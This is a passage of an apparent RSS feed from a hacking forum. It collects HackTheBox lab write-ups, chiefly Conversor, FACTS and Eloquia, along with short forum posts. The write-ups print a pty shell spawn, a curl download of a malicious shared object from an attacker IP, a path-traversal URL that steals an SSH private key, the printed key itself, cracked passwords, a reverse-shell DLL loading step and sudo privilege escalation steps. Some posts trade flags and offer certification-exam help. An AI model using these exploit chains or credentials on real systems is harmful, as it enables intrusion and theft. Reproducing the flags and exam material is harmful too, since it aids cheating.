4. python3 -c 'import pty;pty.spawn("/bin/bash")'<br />
<br />
Credentials extract<br />
----------------------------------<br />
Source code contains SQLite DB users.db<br />
<br />
sqlite3 users.db<br />
.tables<br />
S/ELECT * F/ROM users; (remove the slash, waf block me)<br />
<br />
MD5 hash:<br />
fismathack:5b5c3ac3a1c897c94caad48e6c71fdec<br />
<br />
Cracked via CrackStation:<br />
fismathack:Keepmesafeandwarm<br />
<br />
SSH access:<br />
ssh fismathack@conversor.htb<br />
<br />
Privesc<br />
-------<br />
sudo -l<br />
<br />
User fismathack may run the following commands on conversor:<br />
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart<br />
<br />
Check version:<br />
/usr/sbin/needrestart --version<br />
<br />
needrestart 3.7 - Restart daemons after library updates.<br />
<br />
Vulnerable to CVE-2024-48990 (patched in 3.8)<br />
<br />
CVE-2024-48990 Exploit<br />
---------------------------<br />
Vuln allows Python injection via PYTHONPATH when needrestart runs with sudo<br />
<br />
Create malicious shared object (exploit.c): <a href="https://pastebin.com/cVZYXxRx" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/cVZYXxRx</a><br />
<br />
Compile:<br />
gcc -shared -fPIC -o __init__.so exploit.c<br />
<br />
exploit.sh:<br />
#!/bin/bash<br />
set -e<br />
<br />
cd /tmp<br />
mkdir -p malicious/importlib<br />
<br />
curl <a href="http://10.10.1X.X:8000/__init__.so" target="_blank" rel="noopener" class="mycode_url">http://10.10.1X.X:8000/__init__.so</a> -o /tmp/malicious/importlib/__init__.so<br />
<br />
/tmp/malicious/expl.py : <a href="https://pastebin.com/necqG4Tx" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/necqG4Tx</a><br />
<br />
cd /tmp/malicious<br />
PYTHONPATH="&#36;PWD" python3 expl.py 2&gt;/dev/null<br />
<br />
Terminal 1 (attacker):<br />
python3 -m http.server 8000<br />
<br />
Terminal 2 (victim - ssh #1):<br />
bash exploit.sh<br />
<br />
Terminal 3 (victim - ssh #2):<br />
sudo /usr/sbin/needrestart<br />
<br />
expl.py script detects SUID shell creation and executes it automatically<br />
<br />
whoami<br />
# root<br />
<br />
cat /root/root.txt<br />
<br />
Credentials summary (4 noob)<br />
-------------------<br />
fismathack:Keepmesafeandwarm (SSH)<br />
<br />
<br />
---<br />
<br />
reuploadin my old writeups not available on breachforums here, if a box already has a writeup i dont reupload, like the seasonal room pterodactyl]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[Season10] USER Pterodactyl]]></title>
			<link>https://pwnforums.st/Thread-Season10-USER-Pterodactyl</link>
			<pubDate>Sun, 08 Feb 2026 02:22:41 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=703876">pulsebreaker</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Season10-USER-Pterodactyl</guid>
			<description><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[Season10] ROOT Pterodactyl]]></title>
			<link>https://pwnforums.st/Thread-Season10-ROOT-Pterodactyl</link>
			<pubDate>Sat, 07 Feb 2026 23:07:30 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=703876">pulsebreaker</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Season10-ROOT-Pterodactyl</guid>
			<description><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB - FACTS.HTB - EASY LINUX]]></title>
			<link>https://pwnforums.st/Thread-HTB-FACTS-HTB-EASY-LINUX</link>
			<pubDate>Thu, 05 Feb 2026 08:36:37 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=372312">chain</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-HTB-FACTS-HTB-EASY-LINUX</guid>
			<description><![CDATA[FACTS - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.129.69.95 (ull have a different ip)<br />
<br />
users<br />
-----<br />
william<br />
trivia<br />
<br />
recon<br />
-----<br />
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.129.69.95 (ctf only)<br />
<br />
22/OpenSSH 9.9p1<br />
80/nginx 1.26.3<br />
    - path traversal on CameleonCMS 2.9.0 CVE-2024-46987 (base vuln version 2.8.0 but works on 2.9.0)<br />
54321/http <br />
<br />
exploit<br />
------------<br />
<br />
grabbed /home/trivia/.ssh/id_ed25519 via path traversal:<br />
<a href="http://facts.htb/admin/media/download_private_file?file=,,/,,/,,/,,/,,/,,/home/trivia/.ssh/id_ed25519" target="_blank" rel="noopener" class="mycode_url">http://facts.htb/admin/media/download_pr...id_ed25519</a> (remplate , by . for the path, BF block me)<br />
<br />
-----BEGIN OPENSSH PRIVATE KEY-----<br />
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCd4lFW9D<br />
oZ28sQDBe+ZIltAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAILNlyBF4wULHGQax<br />
bUqV/3L712nR8jkzuG2DHrCPy9r/AAAAoILU2uUq5EuFWxb49m7/O1r+jOXkqJFPDFW3Sx<br />
64HaSutBpMBTpNIWf6RviD/iEjRXHM7dKr6LBzu6PiZ3iA82tlbhAKqfZ9WvWYINhYxiQL<br />
G3jKAVqOn5q6D7s5NSxOe6mOW1d5fshHZXKBqqU3WOt9Wvh9/yCZovIhIRK7/GcXCZdTVY<br />
1Mce3bg0ERwrOixPG5d0SvnvdSLvIzcvaI/+w=<br />
-----END OPENSSH PRIVATE KEY-----<br />
<br />
bruteforced the passphrase:<br />
ssh2john id_ed25519 &gt; hash.txt<br />
john --wordlist=rockyou.txt hash.txt<br />
password: dragonballz<br />
<br />
ssh login as trivia:<br />
ssh -i id_ed25519 trivia@facts.htb (password: dragonballz)<br />
<br />
privesc<br />
-------<br />
sudo -l shows /usr/bin/facter - exploited it to create SUID on bash<br />
<br />
mkdir -p /tmp/.exploit/facter<br />
<br />
in /tmp/.exploit/facter/root.rb add this code: (sorry breachforum blocks me when i wanna write the code directly on the writeup, so heres a pastebin)<br />
<br />
<a href="https://pastebin.com/Pd4vBWHZ" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/Pd4vBWHZ</a><br />
<br />
sudo /usr/bin/facter --custom-dir /tmp/.exploit/facter<br />
/bin/bash -p<br />
<br />
got root <img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpwnforums.st%2Fimages%2Fsmilies%2Fsmile.png" alt="Smile" title="Smile" class="smilie smilie_1" />]]></description>
			<content:encoded><![CDATA[FACTS - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.129.69.95 (ull have a different ip)<br />
<br />
users<br />
-----<br />
william<br />
trivia<br />
<br />
recon<br />
-----<br />
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.129.69.95 (ctf only)<br />
<br />
22/OpenSSH 9.9p1<br />
80/nginx 1.26.3<br />
    - path traversal on CameleonCMS 2.9.0 CVE-2024-46987 (base vuln version 2.8.0 but works on 2.9.0)<br />
54321/http <br />
<br />
exploit<br />
------------<br />
<br />
grabbed /home/trivia/.ssh/id_ed25519 via path traversal:<br />
<a href="http://facts.htb/admin/media/download_private_file?file=,,/,,/,,/,,/,,/,,/home/trivia/.ssh/id_ed25519" target="_blank" rel="noopener" class="mycode_url">http://facts.htb/admin/media/download_pr...id_ed25519</a> (remplate , by . for the path, BF block me)<br />
<br />
-----BEGIN OPENSSH PRIVATE KEY-----<br />
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCd4lFW9D<br />
oZ28sQDBe+ZIltAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAILNlyBF4wULHGQax<br />
bUqV/3L712nR8jkzuG2DHrCPy9r/AAAAoILU2uUq5EuFWxb49m7/O1r+jOXkqJFPDFW3Sx<br />
64HaSutBpMBTpNIWf6RviD/iEjRXHM7dKr6LBzu6PiZ3iA82tlbhAKqfZ9WvWYINhYxiQL<br />
G3jKAVqOn5q6D7s5NSxOe6mOW1d5fshHZXKBqqU3WOt9Wvh9/yCZovIhIRK7/GcXCZdTVY<br />
1Mce3bg0ERwrOixPG5d0SvnvdSLvIzcvaI/+w=<br />
-----END OPENSSH PRIVATE KEY-----<br />
<br />
bruteforced the passphrase:<br />
ssh2john id_ed25519 &gt; hash.txt<br />
john --wordlist=rockyou.txt hash.txt<br />
password: dragonballz<br />
<br />
ssh login as trivia:<br />
ssh -i id_ed25519 trivia@facts.htb (password: dragonballz)<br />
<br />
privesc<br />
-------<br />
sudo -l shows /usr/bin/facter - exploited it to create SUID on bash<br />
<br />
mkdir -p /tmp/.exploit/facter<br />
<br />
in /tmp/.exploit/facter/root.rb add this code: (sorry breachforum blocks me when i wanna write the code directly on the writeup, so heres a pastebin)<br />
<br />
<a href="https://pastebin.com/Pd4vBWHZ" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/Pd4vBWHZ</a><br />
<br />
sudo /usr/bin/facter --custom-dir /tmp/.exploit/facter<br />
/bin/bash -p<br />
<br />
got root <img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpwnforums.st%2Fimages%2Fsmilies%2Fsmile.png" alt="Smile" title="Smile" class="smilie smilie_1" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB Eloquia User and Root Flags - Insane Box]]></title>
			<link>https://pwnforums.st/Thread-HTB-Eloquia-User-and-Root-Flags-Insane-Box</link>
			<pubDate>Fri, 30 Jan 2026 17:48:18 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=318883">69646B</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-HTB-Eloquia-User-and-Root-Flags-Insane-Box</guid>
			<description><![CDATA[tldr:  <br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<br />
<br />
<br />
Attack Path:<br />
Review Website<br />
Register an account on the site<br />
Register an account using the qooqle oath<br />
Create malicious article with html injection to force admin to register new oauth token for you<br />
Report article to admin so trigger CSRF<br />
Change oauth registration, use callback code in CSRF<br />
Get Admin session<br />
<br />
<br />
create malicious dll to get rev shell<br />
upload to a banner as admin (we can do this now since the checks are bypassed as admin)<br />
start listener<br />
Go to eloquia.htb/dev/sql-explorer <br />
Load the dll using the following<br />
SELECT load_extension('statis/assets/images.blog/malicious.dll');<br />
get user shell<br />
type user.txt<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<br />
Creds are stored in browser<br />
Copy local_state.json and login_data.json<br />
Crack password<br />
Olivia.KAT:S3cureP@sswdIGu3ss<br />
Login with evil winrm<br />
<br />
<br />
Failure2ban service is vulnerable to being overwritten.<br />
Overwrite with simple exe to move flag to readable directory or make a new rev shell.<br />
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[tldr:  <br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<br />
<br />
<br />
Attack Path:<br />
Review Website<br />
Register an account on the site<br />
Register an account using the qooqle oath<br />
Create malicious article with html injection to force admin to register new oauth token for you<br />
Report article to admin so trigger CSRF<br />
Change oauth registration, use callback code in CSRF<br />
Get Admin session<br />
<br />
<br />
create malicious dll to get rev shell<br />
upload to a banner as admin (we can do this now since the checks are bypassed as admin)<br />
start listener<br />
Go to eloquia.htb/dev/sql-explorer <br />
Load the dll using the following<br />
SELECT load_extension('statis/assets/images.blog/malicious.dll');<br />
get user shell<br />
type user.txt<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<br />
Creds are stored in browser<br />
Copy local_state.json and login_data.json<br />
Crack password<br />
Olivia.KAT:S3cureP@sswdIGu3ss<br />
Login with evil winrm<br />
<br />
<br />
Failure2ban service is vulnerable to being overwritten.<br />
Overwrite with simple exe to move flag to readable directory or make a new rev shell.<br />
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[FREE] CPTS 12 FLAGS]]></title>
			<link>https://pwnforums.st/Thread-FREE-CPTS-12-FLAGS</link>
			<pubDate>Fri, 30 Jan 2026 13:00:48 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=703876">pulsebreaker</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-FREE-CPTS-12-FLAGS</guid>
			<description><![CDATA[a +rep is appreciated)) ^^<br />
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[a +rep is appreciated)) ^^<br />
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HackTheBox- Season10]]></title>
			<link>https://pwnforums.st/Thread-HackTheBox-Season10</link>
			<pubDate>Wed, 28 Jan 2026 05:18:18 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=706448">natashaftw</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-HackTheBox-Season10</guid>
			<description><![CDATA[HackTheBox Season 10 is starting soon. Join our Discord server so we can share everything as quickly as possible. I will give my Prolabs writeups to all users who join and remain loyal to the Discord server. I will also help with some certification exams.<br />
<br />
<br />
<a href="https://discord.gg/fNdkrtcb" target="_blank" rel="noopener" class="mycode_url">Discord channel</a>]]></description>
			<content:encoded><![CDATA[HackTheBox Season 10 is starting soon. Join our Discord server so we can share everything as quickly as possible. I will give my Prolabs writeups to all users who join and remain loyal to the Discord server. I will also help with some certification exams.<br />
<br />
<br />
<a href="https://discord.gg/fNdkrtcb" target="_blank" rel="noopener" class="mycode_url">Discord channel</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[rev_dudidudida]]></title>
			<link>https://pwnforums.st/Thread-rev-dudidudida</link>
			<pubDate>Mon, 26 Jan 2026 22:33:02 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=20406">cavour13</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-rev-dudidudida</guid>
			<description><![CDATA[dudidudida.exe is done by dlang compiler that make a .d into an object and the in .exe PE32+ win executable..<br />
<br />
i understand that the challenge is to understand the graph and his 3 nodes when you get this you can retrieve the right flag? anyone was able to did this?]]></description>
			<content:encoded><![CDATA[dudidudida.exe is done by dlang compiler that make a .d into an object and the in .exe PE32+ win executable..<br />
<br />
i understand that the challenge is to understand the graph and his 3 nodes when you get this you can retrieve the right flag? anyone was able to did this?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB AirTouch]]></title>
			<link>https://pwnforums.st/Thread-HTB-AirTouch</link>
			<pubDate>Tue, 20 Jan 2026 18:48:02 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=134955">adolfo</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-HTB-AirTouch</guid>
			<description><![CDATA[*<br />
./udpx -t 10.129.11.209 -c 128 -w 1000<br />
<br />
        __  ______  ____ _  __                                                                        <br />
      / / / / __ \/ __ \ |/ /                                                                        <br />
      / / / / / / / /_/ /  /                                                                        <br />
    / /_/ / /_/ / ____/  |                                                                          <br />
    \____/_____/_/  /_/|_|                                                                          <br />
        v1.0.7, by <dvz_me_placeholder id="1" />                                                                          <br />
                                                                                                      <br />
2026/01/19 13:18:12 [+] Starting UDP scan on 1 target(s)                                              <br />
2026/01/19 13:18:24<br />
[*]10.129.11.209:161 (snmp)<br />
2026/01/19 13:18:44 [+] Scan completed]]></description>
			<content:encoded><![CDATA[*<br />
./udpx -t 10.129.11.209 -c 128 -w 1000<br />
<br />
        __  ______  ____ _  __                                                                        <br />
      / / / / __ \/ __ \ |/ /                                                                        <br />
      / / / / / / / /_/ /  /                                                                        <br />
    / /_/ / /_/ / ____/  |                                                                          <br />
    \____/_____/_/  /_/|_|                                                                          <br />
        v1.0.7, by <dvz_me_placeholder id="1" />                                                                          <br />
                                                                                                      <br />
2026/01/19 13:18:12 [+] Starting UDP scan on 1 target(s)                                              <br />
2026/01/19 13:18:24<br />
[*]10.129.11.209:161 (snmp)<br />
2026/01/19 13:18:44 [+] Scan completed]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[CAPE Flag 5]]></title>
			<link>https://pwnforums.st/Thread-CAPE-Flag-5</link>
			<pubDate>Sat, 17 Jan 2026 11:00:43 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=70212">DouglDoul</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-CAPE-Flag-5</guid>
			<description><![CDATA[Hey guys,<br />
<br />
Someone can give me a little nudge on Flag 5, I found the vulnerability between, DC01 and WS01 but my SpoolSample doesn't want to work and I fucking don't know why.<br />
<br />
<br />
Thanks]]></description>
			<content:encoded><![CDATA[Hey guys,<br />
<br />
Someone can give me a little nudge on Flag 5, I found the vulnerability between, DC01 and WS01 but my SpoolSample doesn't want to work and I fucking don't know why.<br />
<br />
<br />
Thanks]]></content:encoded>
		</item>
	</channel>
</rss>